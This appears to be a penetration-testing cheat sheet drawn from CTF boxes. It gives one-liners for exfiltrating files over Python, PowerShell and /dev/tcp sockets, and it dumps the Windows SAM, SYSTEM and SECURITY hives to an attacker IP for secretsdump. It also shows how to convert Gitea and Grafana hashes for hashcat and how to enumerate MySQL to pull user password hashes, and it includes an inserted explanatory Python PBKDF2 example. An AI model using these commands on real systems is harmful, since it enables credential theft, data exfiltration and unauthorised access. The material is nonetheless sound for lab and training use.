Etc

Download file via Python (oneliner)

python -c "import urllib.request; urllib.request.urlretrieve('http://example.com/file.txt', 'file.txt')"

Post file via Python (oneliner)

python -c "import urllib.request, urllib.parse; urllib.request.urlopen(urllib.request.Request('http://example.com/upload', data=urllib.parse.urlencode({'file': open('file.txt', 'rb').read()}).encode()))"

Send file via Python sockets (oneliner)

python -c "import socket; s = socket.socket(); s.connect(('localhost', 8080)); s.sendall(open('file.txt', 'rb').read()); s.close()"

Send file via Powershell sockets

$server = "127.0.0.1"
$port = 8080
$filePath = "file.txt"

$tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port)
$networkStream = $tcpClient.GetStream()
$fileBytes = [System.IO.File]::ReadAllBytes($filePath)
$networkStream.Write($fileBytes, 0, $fileBytes.Length)
$networkStream.Flush()
$networkStream.Close()
$tcpClient.Close()

function SendOverTcp {
    param ([string]$server, $port, $filePath)
    $tcpClient = New-Object Net.Sockets.TcpClient($server, $port)
    $stream = $tcpClient.GetStream()
    $bytes = [IO.File]::ReadAllBytes($filePath)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Close()
    $tcpClient.Close()
}

function SendOverTcp { param([string]$server, $port, $filePath); ($tcpClient = New-Object Net.Sockets.TcpClient($server, $port)).GetStream().Write(($bytes = [IO.File]::ReadAllBytes($filePath)), 0, $bytes.Length); $tcpClient.Close() }

SendOverTcp "localhost" 8080 "file.txt"
SendOverTcp "10.10.14.99" 4444 "C:\Program Files (x86)\hMailServer\Database\hMailServer.sdf"

Send file via Linux sockets

cat file.txt > /dev/tcp/IP/PORT
cat file.txt | base64 > /dev/tcp/IP/PORT
---
# Listener side (raw transfer)
nc -lvnp PORT > file.txt
# Listener side (base64 variant), then decode
nc -lvnp PORT > file.txt.base64
cat file.txt.base64 | base64 -d > file.txt

Hashdump locally with hives

Source: https://gist.github.com/sh1n0b1/8972807

nc -lvnp 4444 > sam.save &
nc -lvnp 4445 > system.save &
nc -lvnp 4446 > security.save &
---
# Save registry keys
reg save hklm\sam sam.save
reg save hklm\system system.save
reg save hklm\security security.save

# Exfiltrate registry
function SendOverTcp { param([string]$server, $port, $filePath); ($tcpClient = New-Object Net.Sockets.TcpClient($server, $port)).GetStream().Write(($bytes = [IO.File]::ReadAllBytes($filePath)), 0, $bytes.Length); $tcpClient.Close() }
$server = "10.10.14.123";
$port = 4444; $filePath = "C:\users\public\music\sam.save"; SendOverTcp "$server" "$port" "$filePath"
$port = 4445; $filePath = "C:\users\public\music\system.save"; SendOverTcp "$server" "$port" "$filePath"
$port = 4446; $filePath = "C:\users\public\music\security.save"; SendOverTcp "$server" "$port" "$filePath"
---
# Dump via impacket secretsdump
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

Note: the SECURITY hive may not be required (SAM and SYSTEM are enough for the local account hashes; SECURITY adds LSA secrets and cached domain credentials).

Hashcat

Gitea to Hashcat

└─$ sqlite3 gitea.db "SELECT REPLACE(name || ':' || 'sha256:50000:' || BASE64(UNHEX(salt)) || ':' || BASE64(UNHEX(passwd)),CHAR(10),'') FROM user"
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

➜ .\hashcat.exe -a 0 -m 10900 .\hashes .\rockyou.txt

Grafana to Hashcat

└─$ sqlite3 grafana.db "SELECT REPLACE('sha256:10000:' || BASE64(CAST(salt AS BLOB)) || ':' || BASE64(UNHEX(password)),CHAR(10),'') FROM user"
sha256:10000:Q0ZuN3pNc1FwZg==:RBpxW9eI6SgXC+eVSxfLGd6DWi3t/ezoxlMnyx2bpr1H1w7bdCGwXZcGumFHy3GXOjQ=
sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb+j5ik+braJyDmUmVIYMWduTV3sSIBwBUSVjddb4g/G42WA=

➜ .\hashcat.exe -a 0 -m 10900 .\hashes .\rockyou.txt
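The two sqlite3 queries above do the same transformation with different storage details: Gitea keeps salt and passwd as hex text (hence UNHEX on both), Grafana keeps the salt as a plain string and only the password as hex, and both are emitted as hashcat mode 10900 lines (sha256:iterations:base64(salt):base64(digest)). The following is an added Python example, not code from the page or from either project. It rebuilds both conversions, then parses a line back and recomputes PBKDF2-HMAC-SHA256 so the iteration count and key length in the line can be checked against a known password. The iteration counts (50000 for Gitea, 10000 for Grafana) and the 50-byte key length follow the lines above; the sample rows, salts and password are constructed here and the digests are derived from that password, so they do not come from any real instance.

```python
import base64
import binascii
import hashlib
import hmac

# Hashcat -m 10900 (PBKDF2-HMAC-SHA256) expects: sha256:<iterations>:<base64(salt)>:<base64(digest)>
# Both apps derive a 50-byte key; Gitea uses 50000 iterations, Grafana 10000 (as in the lines above).
GITEA_ITERATIONS, GRAFANA_ITERATIONS, KEY_LEN = 50000, 10000, 50


def to_hashcat_10900(salt: bytes, digest: bytes, iterations: int, user: str = "") -> str:
    """Format raw salt/digest bytes as one mode-10900 line, optionally prefixed with 'user:'."""
    line = "sha256:%d:%s:%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    )
    return f"{user}:{line}" if user else line


def gitea_row_to_hashcat(name: str, salt_hex: str, passwd_hex: str) -> str:
    """Gitea stores salt and passwd as hex text, hence UNHEX() on both in the sqlite query."""
    return to_hashcat_10900(binascii.unhexlify(salt_hex), binascii.unhexlify(passwd_hex),
                            GITEA_ITERATIONS, user=name)


def grafana_row_to_hashcat(salt: str, password_hex: str) -> str:
    """Grafana stores the salt as a plain string (CAST AS BLOB) and only the password as hex."""
    return to_hashcat_10900(salt.encode(), binascii.unhexlify(password_hex), GRAFANA_ITERATIONS)


def verify_10900(line: str, candidate: str) -> bool:
    """Parse a mode-10900 line (with or without user prefix), recompute PBKDF2, compare constant-time."""
    algo, iterations, salt_b64, digest_b64 = line.split(":")[-4:]
    if algo != "sha256":
        raise ValueError("not a PBKDF2-HMAC-SHA256 line")
    salt, expected = base64.b64decode(salt_b64), base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, int(iterations), len(expected))
    return hmac.compare_digest(actual, expected)


# Constructed sample rows (not data from any real instance): the digests are derived here from a
# known password so the round trip can be checked; the salts are arbitrary fixed values.
SAMPLE_PASSWORD = "correct horse battery staple"
GITEA_SALT_HEX = "30313233343536373839616263646566"  # 16 bytes, as Gitea stores it (hex text)
GRAFANA_SALT = "abcdefghij"                          # 10-char string, as Grafana stores it


def gitea_sample_line() -> str:
    """What the Gitea sqlite query would emit for the constructed 'administrator' row."""
    digest = hashlib.pbkdf2_hmac("sha256", SAMPLE_PASSWORD.encode(),
                                 bytes.fromhex(GITEA_SALT_HEX), GITEA_ITERATIONS, KEY_LEN)
    return gitea_row_to_hashcat("administrator", GITEA_SALT_HEX, digest.hex())


def grafana_sample_line() -> str:
    """What the Grafana sqlite query would emit for the constructed row."""
    digest = hashlib.pbkdf2_hmac("sha256", SAMPLE_PASSWORD.encode(),
                                 GRAFANA_SALT.encode(), GRAFANA_ITERATIONS, KEY_LEN)
    return grafana_row_to_hashcat(GRAFANA_SALT, digest.hex())


if __name__ == "__main__":
    for line in (gitea_sample_line(), grafana_sample_line()):
        print(line, "verifies:", verify_10900(line, SAMPLE_PASSWORD))
```

verify_10900 takes the key length from the decoded digest rather than hard-coding 50, so the same check works for a row from an installation with a different key length; the iteration count is read from the line, which is the value worth auditing when reviewing how an application stores passwords.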

MySQL Enumeration With Language

PHP

PDO

// Get databases
$p=new PDO("mysql:host=db","root","root");foreach($p->query("SHOW DATABASES")as$r)echo$r["Database"]."\n";

// Select database and get tables
$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SHOW TABLES")as$r)echo$r[0]."\n";

// Select database and dump table
$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SELECT * FROM users")as$r)print_r($r);
(remote) www-data@070370e2cdc4:/var/www/html$ php -r '$p=new PDO("mysql:host=db","root","root");foreach($p->query("SHOW DATABASES")as$r)echo$r["Database"]."\n";'
cybermonday
information_schema
mysql
performance_schema
sys
webhooks_api
(remote) www-data@070370e2cdc4:/var/www/html$ php -r '$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SHOW TABLES")as$r)echo$r[0]."\n";'
failed_jobs
migrations
password_resets
personal_access_tokens
products
users
(remote) www-data@070370e2cdc4:/var/www/html$ php -r '$p=new PDO("mysql:host=db;dbname=cybermonday","root","root");foreach($p->query("SELECT * FROM users")as$r)print_r($r)."\n";'
Array
(
    [id] => 1
    [0] => 1
    [username] => admin
    [1] => admin
    [email] => admin@cybermonday.htb
    [2] => admin@cybermonday.htb
    [password] => $2y$10$6kJuFazZjtlrAvBNvg4bpO2fQSunL56QFbodCKG6.Qjw87Z8.fYnG
    [3] => $2y$10$6kJuFazZjtlrAvBNvg4bpO2fQSunL56QFbodCKG6.Qjw87Z8.fYnG
    [isAdmin] => 1
    [4] => 1
    [remember_token] =>
    [5] =>
    [created_at] => 2023-05-29 04:10:36
    [6] => 2023-05-29 04:10:36
    [updated_at] => 2023-05-29 04:14:22
    [7] => 2023-05-29 04:14:22
)

MySQLi

$c=new mysqli("172.17.0.1","wp_user","wp_password");foreach($c->query("SHOW DATABASES")as$r){echo $r["Database"]."\n";};$c->close();
$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SHOW TABLES")->fetch_all()as$r)echo$r[0]."\n";
# Numeric-indexed rows, no column names (prints only the first column of each row)
$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SELECT * FROM wp_users")->fetch_all()as$r)echo$r[0]."\n";
# Associative rows, includes column names
$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");$q=$c->query("SELECT * FROM wp_users");while($r=$q->fetch_assoc())print_r($r);
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password");foreach($c->query("SHOW DATABASES")as$r){echo $r["Database"]."\n";};$c->close();'
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SHOW TABLES")->fetch_all()as$r)echo$r[0]."\n";'
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");foreach($c->query("SELECT * FROM wp_users")->fetch_all()as$r)echo$r[0]."\n";'
php -r '$c=new mysqli("172.17.0.1","wp_user","wp_password","wordpress");$q=$c->query("SELECT * FROM wp_users");while($r=$q->fetch_assoc())print_r($r);'

Python

flask_sqlalchemy

# Get databases
from sqlalchemy import create_engine,text; print([db[0] for db in create_engine('mysql://username:password@host:port/').connect().execute(text('SHOW DATABASES')).fetchall()])

# Get tables
from sqlalchemy import create_engine, text; print([tb[0] for tb in create_engine('mysql://username:password@host:port/database').connect().execute(text('SHOW TABLES')).fetchall()])

# Get rows
from sqlalchemy import create_engine, text; [print(row) for row in create_engine('mysql://username:password@host:port/database').connect().execute(text('SELECT * FROM table')).fetchall()]
atlas@sandworm:/var/www/html/SSA/SSA/submissions$ python3 -c "from sqlalchemy import create_engine,text; print([db[0] for db in create_engine('mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA').connect().execute(text('SHOW DATABASES')).fetchall()])"
['SSA', 'information_schema', 'performance_schema']

atlas@sandworm:/var/www/html/SSA/SSA/submissions$ python3 -c "from sqlalchemy import create_engine, text; print([tb[0] for tb in create_engine('mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA').connect().execute(text('SHOW TABLES')).fetchall()])"
['users']

atlas@sandworm:/var/www/html/SSA/SSA/submissions$ python3 -c "from sqlalchemy import create_engine, text; [print(row) for row in create_engine('mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA').connect().execute(text('SELECT * FROM users')).fetchall()]"
(1, 'Odin', 'pbkdf2:sha256:260000$q0WZMG27Qb6XwVlZ$12154640f87817559bd450925ba3317f93914dc22e2204ac819b90d60018bc1f')
(2, 'silentobserver', 'pbkdf2:sha256:260000$kGd27QSYRsOtk7Zi$0f52e0aa1686387b54d9ea46b2ac97f9ed030c27aac4895bed89cb3a4e09482d')

DiryPipe

An alternative to ncat -lvnkp PORT | tee FILENAME; it was meant to be a one-liner: https://gist.github.com/xHacka/984d4c5cbe52e03205e5e5d2460b63ce
